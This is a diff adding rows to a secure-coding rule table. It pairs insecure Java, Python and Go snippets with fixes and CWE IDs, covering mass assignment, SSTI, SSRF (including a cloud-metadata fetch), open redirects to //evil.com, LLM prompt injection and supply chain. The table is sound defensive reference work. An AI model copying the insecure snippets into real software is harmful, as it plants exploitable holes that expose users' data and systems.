+| BIZ-013 | Mass Assignment (Logic: strong): `BeanUtils.copyProperties` from request to entity | `BeanUtils.copyProperties(req, entity);` | `entity.setDisplayName(req.getDisplayName());`<br>`entity.setLocale(req.getLocale());` | Java/Python/Go Data Binding (Logic: strong) | CWE-915 |
+| BIZ-014 | Mass Assignment (Logic: strong): Jackson allows unknown privileged fields | `objectMapper.readValue(json, User.class)` | `objectMapper.configure(FAIL_ON_UNKNOWN_PROPERTIES, true)`<br>`readValue(json, UserDto.class)` | Java/Python/Go Data Binding (Logic: strong) | CWE-915 |
+| BIZ-015 | Mass Assignment (Logic: strong): PATCH endpoint merges entire map into entity | `entity.merge(payloadMap);` | `applyWhitelistedPatch(entity, payloadMap, Set.of("displayName","phone"));` | Java/Python/Go Data Binding (Logic: strong) | CWE-915 |
+| BIZ-016 | Mass Assignment (Logic: strong): nested privileged object accepted from client | `user.setPermissions(req.getPermissions());` | `user.setPermissions(defaultPermissionsForRole(user.getRole()));` | Java/Python/Go Data Binding (Logic: strong) | CWE-915 |
+| BIZ-017 | Mass Assignment (Logic: strong): DTO includes internal flags (`isVerified`, `isAdmin`) | `public class UserDto { boolean isAdmin; }` | `public class UserDto { String displayName; }` | Java/Python/Go Data Binding (Logic: strong) | CWE-915 |
+| BIZ-018 | Mass Assignment (Logic: strong): ORM auto-save on bound entity | `@Transactional public User update(@RequestBody User u){ return repo.save(u); }` | `@Transactional public UserDto update(@RequestBody UserUpdateDto dto){ User u=repo.getOwned(...); mapAllowed(dto,u); return toDto(u); }` | Java/Python/Go Data Binding (Logic: strong) | CWE-915 |
+| BIZ-019 | Mass Assignment (Logic: strong): request contains `ownerId` and server trusts it | `entity.setOwnerId(req.ownerId());` | `entity.setOwnerId(authUserId());` | Java/Python/Go Data Binding (Logic: strong) | CWE-915 |
+| BIZ-020 | Mass Assignment (Logic: strong): polymorphic binding enables privileged subtype | `@JsonTypeInfo(use = Id.CLASS)` | `@JsonTypeInfo(use = Id.NONE)`<br>`bindToConcreteDtoOnly();` | Java/Python/Go Data Binding (Logic: strong) | CWE-915 |
+| BIZ-021 | Sensitive memory: String used for password material | `String password = req.getPassword();` | `char[] password = req.getPasswordChars();`<br>`Arrays.fill(password, '\0');` | Java/Python/Go Memory Hygiene | CWE-922 |
+| BIZ-022 | Sensitive memory: JWT/API token stored as immutable String | `String token = authHeader.substring(7);` | `char[] token = extractTokenChars(authHeader);`<br>`zeroize(token);` | Java/Python/Go Memory Hygiene | CWE-922 |
+| BIZ-023 | Sensitive memory: private key kept as String in singleton bean | `private String privateKeyPem;` | `private byte[] privateKeyDer;`<br>`destroyMethod="wipe"` | Java/Python/Go Memory Hygiene | CWE-922 |
+| BIZ-024 | Sensitive memory: HttpSession stores plaintext credentials | `session.setAttribute("password", password);` | `session.setAttribute("authContext", shortLivedRef);` | Java/Python/Go Session Safety | CWE-922 |
+| BIZ-025 | Sensitive memory: session stores full OAuth refresh token | `session.setAttribute("refresh_token", rt);` | `session.setAttribute("refresh_token_ref", tokenRef);` | Java/Python/Go Session Safety | CWE-922 |
+| BIZ-026 | Sensitive memory: long-lived static cache keeps secrets forever | `static final Map<String,String> SECRET_CACHE = new HashMap<>();` | `Cache<String,SecretRef> c = expiringSecretRefCache();` | Java/Python/Go Memory Hygiene | CWE-922 |
+| BIZ-027 | Sensitive memory: debug logs dump session attributes | `log.debug("session={}", session.getAttributeNames());` | `log.debug("sessionId={}", session.getId());` | Java/Python/Go Session Safety | CWE-200 |
+| BIZ-028 | Sensitive memory: thread local stores token without cleanup | `TOKEN_CTX.set(token);` | `try { TOKEN_CTX.set(token); } finally { TOKEN_CTX.remove(); }` | Java/Python/Go Memory Hygiene | CWE-922 |
+| BIZ-029 | Sensitive memory: plaintext secret in exception message | `throw new IllegalStateException("bad key " + apiKey);` | `throw new IllegalStateException("invalid key reference");` | Java/Python/Go Memory Hygiene | CWE-209 |
+| BIZ-030 | Sensitive memory: model object serializes secret field by default | `class User { String passwordHash; String apiKey; }` | `class User { String passwordHash; @JsonIgnore String apiKey; }` | Java/Python/Go Memory Hygiene | CWE-922 |
+| BIZ-031 | SSTI: Thymeleaf `th:utext` renders unescaped user input | `<span th:utext="${userInput}"></span>` | `<span th:text="${userInput}"></span>` | Java/Python/Go Template Security | CWE-116 |
+| BIZ-032 | SSTI: Thymeleaf expression assembled from request parameter | `templateEngine.process("__${" + p + "}__", ctx)` | `templateEngine.process("safe-view", ctx)`<br>`ctx.setVariable("v", sanitize(p));` | Java/Python/Go Template Security | CWE-94 |
+| BIZ-033 | SSTI: FreeMarker `?interpret` on untrusted string | `${payload?interpret}` | `${payload?esc}` | Java/Python/Go Template Security | CWE-94 |
+| BIZ-034 | SSTI: FreeMarker template content loaded from user input | `cfg.getTemplate(req.getParameter("tpl"))` | `cfg.getTemplate(allowlistedTemplateName(req.getParameter("tpl")))` | Java/Python/Go Template Security | CWE-116 |
+| BIZ-035 | SSTI: Jinja2 `Template(user_input).render(...)` | `Template(user_input).render(ctx)` | `Environment(autoescape=True).from_string(safe_tpl).render(ctx)` | Java/Python/Go Template Security | CWE-94 |
+| BIZ-036 | SSTI: Jinja2 autoescape disabled in HTML context | `Environment(autoescape=False)` | `Environment(autoescape=True)` | Java/Python/Go Template Security | CWE-116 |
+| BIZ-037 | SSTI: server-side report generator concatenates template fragments from query params | `tpl = base + request.get("section")` | `tpl = base + allowlistSection(request.get("section"))` | Java/Python/Go Template Security | CWE-116 |
+| BIZ-038 | SSTI: Spring view name controlled by request parameter | `return req.getParameter("view");` | `return mapToKnownView(req.getParameter("view"));` | Java/Python/Go Template Security | CWE-94 |
+| BIZ-039 | SSTI: expression language evaluation on user payload | `parser.parseExpression(input).getValue(ctx)` | `renderEscapedLiteral(input)` | Java/Python/Go Template Security | CWE-94 |
+| BIZ-040 | SSTI: HTML report pipeline allows raw placeholders from user notes | `html = html.replace("{{note}}", note);` | `html = html.replace("{{note}}", escapeHtml(note));` | Java/Python/Go Template Security | CWE-116 |
+| BIZ-041 | Business workflow bypass: step transition without state precondition | `order.setStatus(APPROVED);` | `requireState(order, PENDING_REVIEW); order.setStatus(APPROVED);` | Java/Python/Go Business Logic | CWE-840 |
+| BIZ-042 | Business workflow bypass: amount/limit approval not enforced | `transfer.execute(req.amount())` | `approvalPolicy.requireApproved(req.amount(), principal); transfer.execute(req.amount())` | Java/Python/Go Business Logic | CWE-840 |
+| BIZ-043 | Business workflow bypass: negative/refund value allows balance inflation | `balance += req.amount();` | `requirePositiveAmount(req.amount()); balance += req.amount();` | Java/Python/Go Business Logic | CWE-840 |
+| BIZ-044 | Business workflow bypass: duplicate processing due to missing idempotency key | `service.process(req)` | `service.processWithIdempotency(req, req.idempotencyKey())` | Java/Python/Go Business Logic | CWE-840 |
+| BIZ-045 | Business workflow bypass: client-controlled price trusted server-side | `order.setPrice(req.price())` | `order.setPrice(priceCatalog.resolve(req.sku()))` | Java/Python/Go Business Logic | CWE-840 |
+| BIZ-046 | Business workflow bypass: privilege escalation via role change endpoint | `user.setRole(req.role())` | `@PreAuthorize("hasRole('ADMIN')") user.setRole(validatedRole(req.role()))` | Java/Python/Go Business Logic | CWE-269 |
+| BIZ-047 | Business workflow bypass: security decision based on mutable client flag | `if(req.isInternal()) allow();` | `if(principal.hasAuthority("INTERNAL_SERVICE")) allow();` | Java/Python/Go Business Logic | CWE-807 |
+| BIZ-048 | Business workflow bypass: multi-tenant query missing tenant predicate | `repo.findByStatus(status)` | `repo.findByStatusAndTenantId(status, tenantIdFromToken())` | Java/Python/Go Business Logic | CWE-639 |
+| BIZ-049 | Business workflow bypass: export endpoint leaks full dataset without scope filter | `return repo.findAll();` | `return repo.findAllByScope(scopeFromPrincipal(principal));` | Java/Python/Go Business Logic | CWE-284 |
+| BIZ-050 | Business workflow bypass: server trusts client-computed signature/hash | `if(req.hash().equals(calc(req.payload()))) accept();` | `if(verifyHmac(req.payload(), req.mac(), serverSecret())) accept();` | Java/Python/Go Business Logic | CWE-345 |
+| BIZ-051 | API Verbosity: DTO exposes internal DB sequence id in public response | `public record UserDto(Long id, String email) {}` | `public record UserDto(String externalId, String email) {}` | Java/Python/Go API Output Hardening | CWE-213 |
+| BIZ-052 | API Verbosity: Jackson serializes `createdByInternalService` metadata | `class AuditDto { String createdByInternalService; }` | `class AuditDto { @JsonIgnore String createdByInternalService; }` | Java/Python/Go API Output Hardening | CWE-213 |
+| BIZ-053 | API Verbosity: entity returned directly leaks persistence internals | `return ResponseEntity.ok(entity);` | `return ResponseEntity.ok(mapper.toPublicDto(entity));` | Java/Python/Go API Output Hardening | CWE-213 |
+| BIZ-054 | API Verbosity: stack trace included in API error payload | `return Map.of("error", ex.getMessage(), "trace", stackTrace(ex));` | `return Map.of("error", "internal_error", "requestId", requestId);` | Java/Python/Go API Output Hardening | CWE-213 |
+| BIZ-055 | API Verbosity: optimistic lock/version field exposed to clients | `record OrderDto(Long id, Integer version, ...)` | `record OrderDto(String orderRef, ...)` | Java/Python/Go API Output Hardening | CWE-213 |
+| BIZ-056 | Open Redirect: `redirect:` built from unvalidated request parameter | `return "redirect:" + redirectUrl;` | `return "redirect:" + safeRedirect(redirectUrl, Set.of("/home","/profile"));` | Java/Python/Go Navigation Security | CWE-601 |
+| BIZ-057 | Open Redirect: `sendRedirect` with user-controlled absolute URL | `resp.sendRedirect(req.getParameter("next"));` | `resp.sendRedirect(allowlistedPath(req.getParameter("next")));` | Java/Python/Go Navigation Security | CWE-601 |
+| BIZ-058 | Open Redirect: OAuth callback `state/returnUrl` not origin-validated | `return "redirect:" + returnUrl;` | `return "redirect:" + validateReturnUrlSameOrigin(returnUrl);` | Java/Python/Go Navigation Security | CWE-601 |
+| BIZ-059 | Open Redirect: URL validation by substring/startsWith bypassable | `if (u.startsWith("https://myapp.com")) redirect(u);` | `if (isAllowlistedHostAndScheme(u)) redirect(u);` | Java/Python/Go Navigation Security | CWE-601 |
+| BIZ-060 | Open Redirect: protocol-relative URL (`//evil.com`) accepted | `redirect = req.getParameter("url");` | `redirect = rejectProtocolRelative(req.getParameter("url"));` | Java/Python/Go Navigation Security | CWE-601 |
+| BIZ-061 | User Enumeration: auth endpoint returns "user not found" vs "wrong password" | `return "User does not exist";` | `return "Invalid username or password";` | Java/Python/Go Authentication UX | CWE-1039 |
+| BIZ-062 | User Enumeration: password reset reveals account existence by message | `return "Email not registered";` | `return "If account exists, reset instructions sent";` | Java/Python/Go Authentication UX | CWE-1039 |
+| BIZ-063 | User Enumeration: account lookup timing differs for valid/invalid users | `if(user==null) return failFast();` | `performConstantTimeAuthPath(username, password);` | Java/Python/Go Authentication UX | CWE-203 |
+| BIZ-064 | User Enumeration: registration says "email already exists" without throttling/masking | `throw new Conflict("email exists");` | `return genericRegistrationResponse();` | Java/Python/Go Authentication UX | CWE-1039 |
+| BIZ-065 | User Enumeration: MFA initiation leaks if phone/email enrolled | `return "MFA not configured for this user";` | `return "If eligible, MFA challenge was sent";` | Java/Python/Go Authentication UX | CWE-1039 |
+| BIZ-066 | Log Injection: unsanitized user input logged directly with SLF4J placeholder | `log.warn("login failed for {}", username);` | `log.warn("login failed for {}", stripCrLf(username));` | Java/Python/Go Logging Hygiene | CWE-117 |
+| BIZ-067 | Log Injection: concatenated request header values in logs without neutralization | `log.info("ua=" + req.getHeader("User-Agent"));` | `log.info("ua={}", stripCrLf(req.getHeader("User-Agent")));` | Java/Python/Go Logging Hygiene | CWE-117 |
+| BIZ-068 | Log Injection: exception context includes untrusted path/query data | `log.error("bad request " + req.getQueryString());` | `log.error("bad request {}", sanitizeForLog(req.getQueryString()));` | Java/Python/Go Logging Hygiene | CWE-117 |
+| BIZ-069 | Log Injection: audit event stores raw multiline payload | `audit.log("payload", body);` | `audit.log("payload", flattenAndEscapeCrLf(body));` | Java/Python/Go Logging Hygiene | CWE-117 |
+| BIZ-070 | API Verbosity: debug serialization includes SQL error details and table names | `return ResponseEntity.badRequest().body(sqlException.toString());` | `return ResponseEntity.badRequest().body("validation_error");` | Java/Python/Go API Output Hardening | CWE-209 |
+| BIZ-071 | API Verbosity: exposing internal enum/state machine transitions in response | `return Map.of("allowedTransitions", order.internalTransitions());` | `return Map.of("status", order.publicStatus());` | Java/Python/Go API Output Hardening | CWE-213 |
+| EXH-001 | DoS: unbounded `size` query parameter in REST pagination | `int size = Integer.parseInt(req.getParameter("size"));` | `int size = Math.min(parsePositiveInt(req.getParameter("size"), 20), 100);` | Java REST Resource Governance | CWE-770 |
+| EXH-002 | DoS: controller passes client limit directly to repository | `repo.findAll(PageRequest.of(page, limit));` | `repo.findAll(PageRequest.of(page, clamp(limit, 1, 100)));` | Java REST Resource Governance | CWE-770 |
+| EXH-003 | DoS: GraphQL first/last argument not capped | `users(first: $first)` | `users(first: min($first, 100))` | Java GraphQL Resource Governance | CWE-770 |
+| EXH-004 | DoS: bulk endpoint accepts unbounded id list | `service.fetchByIds(req.ids());` | `service.fetchByIds(req.ids().stream().limit(200).toList());` | Java REST Resource Governance | CWE-770 |
+| EXH-005 | DoS: stream reads full body into memory | `byte[] b = request.getInputStream().readAllBytes();` | `enforceBodyLimit(request, 10 * 1024 * 1024);` | Java REST Resource Governance | CWE-770 |
+| EXH-006 | DoS: CSV import with unlimited rows | `for (String row : rows) { process(row); }` | `for (String row : rows.stream().limit(10000).toList()) { process(row); }` | Java Batch Resource Governance | CWE-770 |
+| EXH-007 | DoS: nested collection expansion without depth limit | `expand(node);` | `expandWithDepth(node, 0, 5);` | Java Data Processing Hardening | CWE-770 |
+| EXH-008 | DoS: regex from user input compiled/executed without timeout | `Pattern.compile(userRegex).matcher(input).find();` | `safeRegexEngine.matchWithTimeout(userRegex, input, Duration.ofMillis(100));` | Java Input Processing Hardening | CWE-1333 |
+| EXH-009 | DoS: sort field list unbounded in API | `repo.search(filters, sortFields);` | `repo.search(filters, sortFields.stream().limit(5).toList());` | Java REST Resource Governance | CWE-770 |
+| EXH-010 | DoS: expensive export endpoint without row cap | `return exporter.dumpAll();` | `return exporter.dumpLimited(maxRowsFromPolicy());` | Java API Resource Governance | CWE-770 |
+| SSR-001 | SSRF (Logic: strong): user-controlled URL sent via RestTemplate | `restTemplate.getForObject(urlFromReq, String.class);` | `restTemplate.getForObject(allowlistedOutboundUrl(urlFromReq), String.class);` | Java SSRF Defense (Logic: strong) | CWE-918 |
+| SSR-002 | SSRF (Logic: strong): WebClient `.uri()` uses raw request parameter | `webClient.get().uri(target).retrieve();` | `webClient.get().uri(validateHttpsAllowlist(target)).retrieve();` | Java SSRF Defense (Logic: strong) | CWE-918 |
+| SSR-003 | SSRF (Logic: strong): Feign target host derived from header | `client.call(req.getHeader("X-Target-Host"));` | `client.call(resolveTrustedService(req.getHeader("X-Service-Key")));` | Java SSRF Defense (Logic: strong) | CWE-918 |
+| SSR-004 | SSRF (Logic: strong): outbound request forwards user `Host` header | `headers.set("Host", req.getHeader("Host"));` | `headers.set("Host", trustedHostForService(serviceId));` | Java SSRF Defense (Logic: strong) | CWE-918 |
+| SSR-005 | SSRF (Logic: strong): URL parser allows internal CIDR targets | `URI u = URI.create(url);` | `URI u = parseAndRejectPrivateRanges(url);` | Java SSRF Defense (Logic: strong) | CWE-918 |
+| SSR-006 | SSRF (Logic: strong): metadata endpoint access not denied | `http.get("http://169.254.169.254/latest/meta-data");` | `throwIfMetadataAddress(url);` | Java SSRF Defense (Logic: strong) | CWE-918 |
+| SSR-007 | SSRF (Logic: strong): redirect-follow enabled on untrusted upstream | `HttpClient.newBuilder().followRedirects(ALWAYS)` | `HttpClient.newBuilder().followRedirects(NEVER)` | Java SSRF Defense (Logic: strong) | CWE-918 |
+| SSR-008 | SSRF (Logic: strong): DNS rebinding not mitigated for allowlisted domains | `if (allowlist.contains(host)) request(url);` | `if (allowlist.contains(host) && resolvesToPublicIp(host)) request(url);` | Java SSRF Defense (Logic: strong) | CWE-918 |
+| SSR-009 | SSRF (Logic: strong): proxy endpoint tunnels arbitrary scheme | `proxy.fetch(req.getParameter("url"));` | `proxy.fetch(requireSchemeAndHost(req.getParameter("url"), "https", ALLOWLIST));` | Java SSRF Defense (Logic: strong) | CWE-918 |
+| SSR-010 | SSRF (Logic: strong): SSRF via user-controlled webhook callback URL | `webhookService.send(callbackUrl, payload);` | `webhookService.send(approvedCallback(callbackUrl), payload);` | Java SSRF Defense (Logic: strong) | CWE-918 |
+| LOG-001 | AuthZ logic uses `==` for object/string identity checks | `if (user.getRole() == "ADMIN") allow();` | `if ("ADMIN".equals(user.getRole())) allow();` | Java AuthZ Logic Integrity | CWE-1025 |
+| LOG-002 | AuthZ compare uses case-normalization without fixed locale | `if (scope.toLowerCase().equals("admin"))` | `if (scope.toLowerCase(Locale.ROOT).equals("admin"))` | Java AuthZ Logic Integrity | CWE-1025 |
+| LOG-003 | AuthZ compare uses `toUpperCase()` without locale root | `if (perm.toUpperCase().contains("PAYMENT"))` | `if (perm.toUpperCase(Locale.ROOT).contains("PAYMENT"))` | Java AuthZ Logic Integrity | CWE-1025 |
+| LOG-004 | Locale-sensitive comparison in security filter | `if (tokenType.toLowerCase().startsWith("bearer"))` | `if (tokenType.toLowerCase(Locale.ROOT).startsWith("bearer"))` | Java AuthZ Logic Integrity | CWE-1025 |
+| LOG-005 | Unicode normalization ignored in permission comparison | `if (input.equals(storedPermission))` | `if (normalizeNFKC(input).equals(normalizeNFKC(storedPermission)))` | Java AuthZ Logic Integrity | CWE-176 |
+| LOG-006 | Collection containment check on mutable principal attributes | `if (groups.contains(req.group())) allow();` | `if (immutableGroups(principal).contains(req.group())) allow();` | Java AuthZ Logic Integrity | CWE-367 |
+| LOG-007 | Permission check uses substring match (`contains`) | `if (role.contains("admin"))` | `if (Set.of("admin","super-admin").contains(role))` | Java AuthZ Logic Integrity | CWE-1025 |
+| LOG-008 | Access decision based on localized display name | `if ("Администратор".equals(user.getRoleName()))` | `if ("ROLE_ADMIN".equals(user.getRoleCode()))` | Java AuthZ Logic Integrity | CWE-1025 |
+| LOG-009 | Security key map uses default locale normalization | `rights.get(action.toLowerCase())` | `rights.get(action.toLowerCase(Locale.ROOT))` | Java AuthZ Logic Integrity | CWE-1025 |
+| LOG-010 | Token audience comparison not constant-time | `if (jwt.getAudience().get(0).equals(expectedAud))` | `if (MessageDigest.isEqual(audBytes(jwt), audBytes(expectedAud)))` | Java AuthZ Logic Integrity | CWE-208 |
+| EXH-011 | DoS: unbounded offset parameter enables deep scan and DB pressure | `repo.search(q, offset, limit);` | `repo.search(q, clamp(offset, 0, 10000), clamp(limit, 1, 100));` | Java REST Resource Governance | CWE-770 |
+| EXH-012 | DoS: GraphQL nested selection depth not limited | `graphQl.execute(query);` | `graphQl.execute(enforceMaxDepth(query, 8));` | Java GraphQL Resource Governance | CWE-770 |
+| EXH-013 | DoS: unrestricted `IN` clause size from user payload | `repo.findByIdIn(req.ids());` | `repo.findByIdIn(req.ids().stream().limit(200).toList());` | Java Data Access Governance | CWE-770 |
+| EXH-014 | DoS: report generation accepts arbitrary date range | `reportSvc.generate(req.from(), req.to());` | `reportSvc.generate(requireMaxRange(req.from(), req.to(), 31), req.to());` | Java API Resource Governance | CWE-770 |
+| EXH-015 | DoS: zip archive extraction without total size budget | `extractAll(zipInput, outDir);` | `extractWithBudget(zipInput, outDir, 200 * 1024 * 1024L);` | Java File Processing Security | CWE-409 |
+| SSR-011 | SSRF (Logic: strong): URL allowlist check performed after outbound request | `Response r = client.get(url); validate(url);` | `String safe = validate(url); Response r = client.get(safe);` | Java SSRF Defense (Logic: strong) | CWE-918 |
+| SSR-012 | SSRF (Logic: strong): internal service URL selected from user header key | `String upstream = routes.get(req.getHeader("X-Upstream"));` | `String upstream = trustedRoutes().getOrDefault(req.getHeader("X-Upstream"), defaultRoute());` | Java SSRF Defense (Logic: strong) | CWE-918 |
+| LOG-011 | AuthZ logic compares canonicalized usernames with default locale | `if (u.toLowerCase().equals(owner.toLowerCase()))` | `if (u.toLowerCase(Locale.ROOT).equals(owner.toLowerCase(Locale.ROOT)))` | Java AuthZ Logic Integrity | CWE-1025 |
+| LOG-012 | AuthZ check uses `equalsIgnoreCase` on security-sensitive identifiers | `if (tenant.equalsIgnoreCase(reqTenant)) allow();` | `if (tenant.equals(reqTenant)) allow();` | Java AuthZ Logic Integrity | CWE-1025 |
+| LOG-013 | Role comparison trims and lowercases user-controlled role string without canonical map | `if (req.role().trim().toLowerCase(Locale.ROOT).equals("admin"))` | `if (Role.ADMIN.code().equals(roleMapper.canonical(req.role())))` | Java AuthZ Logic Integrity | CWE-1025 |
+| EXH-016 | DoS: request fan-out invokes downstream in unbounded parallel loop | `ids.parallelStream().forEach(id -> client.fetch(id));` | `ids.stream().limit(200).forEach(id -> rateLimitedClient.fetch(id));` | Java Resource Governance | CWE-770 |
+| SSR-013 | SSRF (Logic: strong): URL decoded twice before validation | `String u = URLDecoder.decode(reqUrl, UTF_8); outbound.call(u);` | `String u = canonicalizeAndValidateOnce(reqUrl); outbound.call(u);` | Java SSRF Defense (Logic: strong) | CWE-918 |
+| LOG-014 | AuthZ map key comparison mixes locale-sensitive and raw values | `permMap.get(input.toLowerCase()).equals("allow")` | `permMap.get(input.toLowerCase(Locale.ROOT)).equals("allow")` | Java AuthZ Logic Integrity | CWE-1025 |
+| EXH-017 | DoS: endpoint accepts arbitrary `topN` for in-memory ranking | `return service.topN(req.topN());` | `return service.topN(clamp(req.topN(), 1, 1000));` | Java Resource Governance | CWE-770 |
+| AI-001 | LLM Prompt Injection (Logic: strong): raw user prompt concatenated with system instructions | `String finalPrompt = SYSTEM_PROMPT + userInput;` | `String finalPrompt = promptGuard.compose(SYSTEM_PROMPT, sanitizePrompt(userInput));` | Java AI Security (Logic: strong) | CWE-1336 |
+| AI-002 | LLM Prompt Injection (Logic: strong): untrusted markdown/tool directives forwarded to model | `client.chat(userMessage);` | `client.chat(stripToolDirectives(userMessage));` | Java AI Security (Logic: strong) | CWE-1336 |
+| AI-003 | LLM Prompt Injection (Logic: strong): retrieval chunks inserted without trust boundary tags | `prompt += docChunk;` | `prompt += safeContextEnvelope(docChunk, sourceId);` | Java AI Security (Logic: strong) | CWE-1336 |
+| AI-004 | LLM Prompt Injection (Logic: strong): model allowed to call tools from user text instruction | `agent.execute(userPrompt);` | `agent.executeWithToolPolicy(userPrompt, allowlistedTools);` | Java AI Security (Logic: strong) | CWE-1336 |
+| AI-005 | LLM Prompt Injection (Logic: strong): no instruction hierarchy separation in multi-turn chat | `messages.add(new Msg("system+user", merged));` | `messages.add(systemMsg()); messages.add(userMsg(sanitize(user)));` | Java AI Security (Logic: strong) | CWE-1336 |
+| AI-006 | LLM Data Leak (Logic: strong): API keys included in LLM prompt context | `prompt.put("apiKey", apiKey);` | `prompt.put("apiKeyRef", keyRef);` | Java AI Security (Logic: strong) | CWE-200 |
+| AI-007 | LLM Data Leak (Logic: strong): full JWT/session token sent to external AI API | `chat.put("token", bearerToken);` | `chat.put("tokenHash", sha256(tokenId));` | Java AI Security (Logic: strong) | CWE-922 |
+| AI-008 | LLM Data Leak (Logic: strong): PII payload forwarded without redaction | `llmClient.send(customerRecordJson);` | `llmClient.send(redactPii(customerRecordJson));` | Java AI Security (Logic: strong) | CWE-359 |
+| AI-009 | LLM Data Leak (Logic: strong): stack traces/internal paths included in AI debugging prompt | `prompt += stackTrace(ex);` | `prompt += errorFingerprint(ex);` | Java AI Security (Logic: strong) | CWE-209 |
+| AI-010 | LLM Data Leak (Logic: strong): DB dump/sample rows sent to model | `prompt += rows.toString();` | `prompt += aggregateStats(rows);` | Java AI Security (Logic: strong) | CWE-200 |
+| AI-011 | Insecure AI-generated code pattern: generated SQL executed without parameterization | `statement.execute(generatedSql);` | `jdbcTemplate.query(sqlTemplate, params, mapper);` | Java AI Security (Logic: strong) | CWE-89 |
+| AI-012 | Insecure AI-generated code pattern: generated shell command executed directly | `Runtime.getRuntime().exec(generatedCmd);` | `processBuilder.command(allowlistedCommand(generatedCmd));` | Java AI Security (Logic: strong) | CWE-78 |
+| AI-013 | Insecure AI-generated code pattern: generated regex prone to catastrophic backtracking | `Pattern.compile(generatedRegex);` | `safeRegexCompiler.compile(generatedRegex, maxComplexity());` | Java AI Security (Logic: strong) | CWE-1333 |
+| AI-014 | Insecure AI-generated code pattern: generated deserializer enables polymorphic type loading | `mapper.activateDefaultTyping(...);` | `mapper.disableDefaultTyping(); mapper.registerSubtypes(allowlistedTypes);` | Java AI Security (Logic: strong) | CWE-502 |
+| AI-015 | Insecure AI-generated code pattern: generated ACL check uses `contains("admin")` | `if (role.contains("admin")) allow();` | `if (Set.of("ROLE_ADMIN").contains(role)) allow();` | Java AI Security (Logic: strong) | CWE-285 |
+| AI-016 | LLM Response Trust (Logic: strong): model output directly used as URL for backend fetch | `http.get(llmOutputUrl);` | `http.get(validateAllowlistedUrl(llmOutputUrl));` | Java AI Security (Logic: strong) | CWE-918 |
+| AI-017 | LLM Response Trust (Logic: strong): model output directly used in SQL query template | `String q = "select * from t where " + llmClause;` | `String q = "select * from t where field = ?";` | Java AI Security (Logic: strong) | CWE-89 |
+| AI-018 | LLM Response Trust (Logic: strong): model output used as filesystem path | `Files.readString(Path.of(llmPath));` | `Files.readString(safeBase.resolve(validatedRelative(llmPath)));` | Java AI Security (Logic: strong) | CWE-22 |
+| AI-019 | LLM Response Trust (Logic: strong): model output used as auth policy decision | `if ("allow".equals(llmDecision)) grant();` | `if (policyEngine.evaluate(requestCtx)) grant();` | Java AI Security (Logic: strong) | CWE-285 |
+| AI-020 | LLM Response Trust (Logic: strong): model output interpreted as template expression | `engine.eval(llmTemplate);` | `engine.renderEscaped(llmTemplateLiteral);` | Java AI Security (Logic: strong) | CWE-94 |
+| AI-021 | LLM Ops (Logic: strong): no output moderation/guardrails before user display | `return llmClient.complete(prompt);` | `return moderationGuard.filter(llmClient.complete(prompt));` | Java AI Security (Logic: strong) | CWE-116 |
+| AI-022 | LLM Ops (Logic: strong): no max token budget causing runaway costs/DoS | `client.complete(prompt);` | `client.completeWithBudget(prompt, 2048, timeoutMs);` | Java AI Security (Logic: strong) | CWE-770 |
+| AI-023 | LLM Ops (Logic: strong): no allowlist for model/provider routing in runtime | `model = req.getModel();` | `model = allowlistedModel(req.getModel());` | Java AI Security (Logic: strong) | CWE-915 |
+| AI-024 | LLM Ops (Logic: strong): conversation memory stores secrets indefinitely | `memoryStore.append(messages);` | `memoryStore.append(scrubSecrets(messages), ttlMinutes(30));` | Java AI Security (Logic: strong) | CWE-922 |
+| AI-025 | LLM Ops (Logic: strong): tool-call arguments from model executed without schema validation | `tool.run(modelArgs);` | `tool.run(validateAgainstSchema(modelArgs, toolSchema));` | Java AI Security (Logic: strong) | CWE-20 |
+| SC-001 | Supply Chain: Maven repository uses insecure HTTP URL | `<url>http://repo.example.com/maven2</url>` | `<url>https://repo.example.com/maven2</url>` | Java Supply Chain Integrity | CWE-494 |
+| SC-002 | Supply Chain: Maven mirror points to untrusted wildcard source | `<mirrorOf>*</mirrorOf><url>https://unknown-mirror.tld</url>` | `<mirrorOf>central</mirrorOf><url>https://repo.maven.apache.org/maven2</url>` | Java Supply Chain Integrity | CWE-494 |
+| SC-003 | Supply Chain: Gradle repository allows HTTP (`allowInsecureProtocol=true`) | `allowInsecureProtocol = true` | `allowInsecureProtocol = false` | Java Supply Chain Integrity | CWE-494 |
+| SC-004 | Supply Chain: Gradle uses dynamic version `latest.release` for critical dependency | `implementation("org.lib:core:latest.release")` | `implementation("org.lib:core:1.8.4")` | Java Supply Chain Integrity | CWE-1104 |
+| SC-005 | Supply Chain: Maven dependency version range without pinning | `<version>[1.0,)</version>` | `<version>1.4.2</version>` | Java Supply Chain Integrity | CWE-1104 |
+| SC-006 | Supply Chain: Snapshot dependency used in production build | `<version>2.0.0-SNAPSHOT</version>` | `<version>2.0.1</version>` | Java Supply Chain Integrity | CWE-1104 |
+| SC-007 | Supply Chain: plugin repository from untrusted host | `<pluginRepository><url>https://random.tld/plugins</url></pluginRepository>` | `<pluginRepository><url>https://repo.maven.apache.org/maven2</url></pluginRepository>` | Java Supply Chain Integrity | CWE-494 |
+| SC-008 | Supply Chain: checksum/signature verification disabled in build | `<checksumPolicy>ignore</checksumPolicy>` | `<checksumPolicy>fail</checksumPolicy>` | Java Supply Chain Integrity | CWE-353 |
+| SC-009 | Supply Chain: build script executes dependency-provided shell script directly | `exec { commandLine "sh", depScript }` | `exec { commandLine "sh", allowlistedScript(depScript) }` | Java Supply Chain Integrity | CWE-78 |
+| SC-010 | Supply Chain: private repository credentials hardcoded in build file | `username = "repo-user"; password = "repo-pass"` | `username = System.getenv("REPO_USER"); password = System.getenv("REPO_PASS")` | Java Supply Chain Integrity | CWE-798 |
+| SC-011 | Unverified custom serializer: `Externalizable.readExternal` trusts raw length prefix | `int n=in.readInt(); byte[] b=new byte[n];` | `int n=requireRange(in.readInt(),0,MAX_LEN); byte[] b=new byte[n];` | Java Serialization Safety | CWE-502 |
+| SC-012 | Unverified custom serializer: `readExternal` uses reflection class name from stream | `Class.forName(in.readUTF()).newInstance();` | `deserializeAllowlistedType(in.readUTF(), ALLOWLIST);` | Java Serialization Safety | CWE-502 |
+| SC-013 | Unverified custom serializer: manual byte parsing without bounds checks | `buf[pos++] = in.readByte();` | `buf[safeIncrement(pos, buf.length)] = in.readByte();` | Java Serialization Safety | CWE-119 |
+| SC-014 | Unverified custom serializer: deserialization bypasses object invariants | `obj.balance = in.readLong();` | `obj.setBalance(validateBalance(in.readLong()));` | Java Serialization Safety | CWE-915 |
+| SC-015 | Unverified custom serializer: `writeExternal` leaks secret fields | `out.writeUTF(apiKey);` | `out.writeUTF(maskedOrRef(apiKey));` | Java Serialization Safety | CWE-200 |
